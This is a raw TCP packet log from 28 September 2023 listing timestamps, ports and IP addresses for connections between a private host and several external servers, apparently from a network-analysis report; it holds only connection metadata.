                                                                                              Sep 28, 2023 06:01:55.126048088 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126072884 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126087904 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126121998 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126149893 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126192093 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126219034 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126260042 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126269102 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126322031 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126326084 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126363039 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126370907 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126411915 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126480103 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126516104 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126524925 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126529932 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126557112 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126576900 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126604080 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126636982 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.126647949 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.126678944 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231087923 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231174946 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231195927 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231219053 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231239080 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231259108 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231292963 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231343985 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231344938 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231367111 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231386900 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231395960 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231436014 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231439114 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231486082 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231525898 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231563091 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231584072 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231600046 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231611967 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231637001 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231650114 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231687069 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231707096 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231743097 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231764078 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231784105 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231812954 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231869936 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231892109 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231928110 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.231950045 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231976986 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.231996059 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232032061 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232053041 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232073069 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232100010 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232157946 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232199907 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232237101 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232254982 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232273102 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232284069 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232310057 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232323885 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232359886 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232378006 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232417107 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232438087 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232467890 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232485056 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232542038 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232553005 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232589960 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232610941 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232625961 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232639074 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232672930 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232693911 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232748985 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232760906 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232796907 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232817888 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232832909 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232845068 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232882977 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232901096 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.232953072 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.232969999 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233026028 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233067989 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233124971 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233136892 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233196020 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233203888 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233239889 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233259916 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233288050 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233366966 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233422041 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233438015 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233474016 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233494043 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233522892 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233542919 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233598948 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233611107 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233648062 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233664989 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233695030 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233715057 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233772039 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233786106 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233840942 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233854055 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233907938 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233923912 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.233979940 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.233992100 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234029055 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234049082 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234077930 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234127998 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234185934 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234198093 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234252930 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234297991 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234333992 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234354973 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234369993 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234381914 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234417915 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234488010 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234524965 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234544992 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234560966 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234575033 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234612942 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234628916 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234664917 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234683037 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234710932 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234733105 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234767914 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234787941 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234816074 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234836102 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234891891 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234905005 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234941006 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.234961033 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.234987974 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.235007048 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.235061884 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.235074997 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.235129118 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.235145092 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.235181093 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.235204935 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.235217094 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.235224009 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.235251904 CEST8049799192.185.131.188192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.235266924 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.235297918 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:01:55.325270891 CEST498012450192.168.2.381.19.131.36
                                                                                              Sep 28, 2023 06:01:55.452064991 CEST4979880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:55.452508926 CEST4980280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:55.485795021 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.486001015 CEST498012450192.168.2.381.19.131.36
                                                                                              Sep 28, 2023 06:01:55.486907959 CEST498012450192.168.2.381.19.131.36
                                                                                              Sep 28, 2023 06:01:55.639832020 CEST804979895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.640017033 CEST4979880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:55.642793894 CEST804980295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.642891884 CEST4980280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:55.643115044 CEST4980280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:55.696873903 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.833013058 CEST804980295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.834059000 CEST804980295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.834224939 CEST4980280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:55.862008095 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:55.862474918 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:55.898714066 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:01:55.900820017 CEST498012450192.168.2.381.19.131.36
                                                                                              Sep 28, 2023 06:01:56.042954922 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.043015003 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.043205023 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.043217897 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.043380022 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.061727047 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.106333017 CEST498012450192.168.2.381.19.131.36
                                                                                              Sep 28, 2023 06:01:56.224180937 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.226186991 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.226274967 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.226314068 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.226350069 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.226385117 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.226480007 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.226516962 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.226560116 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.226560116 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.226560116 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.226560116 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.226560116 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.226561069 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.226561069 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.226613045 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.226663113 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.226696014 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.226943970 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.227003098 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.227004051 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.251166105 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:01:56.407191992 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407236099 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407273054 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407308102 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407341957 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407377005 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407402992 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407403946 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407403946 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407403946 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407403946 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407432079 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407470942 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407485962 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407486916 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407509089 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407521963 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407546997 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407568932 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407583952 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407599926 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407622099 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407658100 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407660007 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407695055 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407706976 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407706976 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407766104 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407785892 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407821894 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407851934 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407859087 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407875061 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407895088 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407922029 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407932997 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407941103 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.407968998 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.407982111 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.408030987 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.418092012 CEST8049805178.237.33.50192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.418353081 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:01:56.418518066 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:01:56.588391066 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.588464022 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.588500977 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.588540077 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.588577032 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.588610888 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.588746071 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.588762999 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.588763952 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.588763952 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.588763952 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.588763952 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.588763952 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.588782072 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.588819981 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.588850975 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.588850975 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.588856936 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.588884115 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.588937998 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.588984966 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589021921 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589070082 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589070082 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589123964 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589200020 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589253902 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589289904 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589324951 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589345932 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589386940 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589457989 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589459896 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589529037 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589557886 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589593887 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589627981 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589648008 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589663982 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589700937 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589734077 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589736938 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589756966 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589773893 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589792013 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589811087 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589816093 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589848995 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589865923 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589884996 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589890957 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589920044 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589942932 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589956045 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.589968920 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.589991093 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590007067 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.590028048 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.590044975 CEST4980480192.168.2.3157.90.36.211
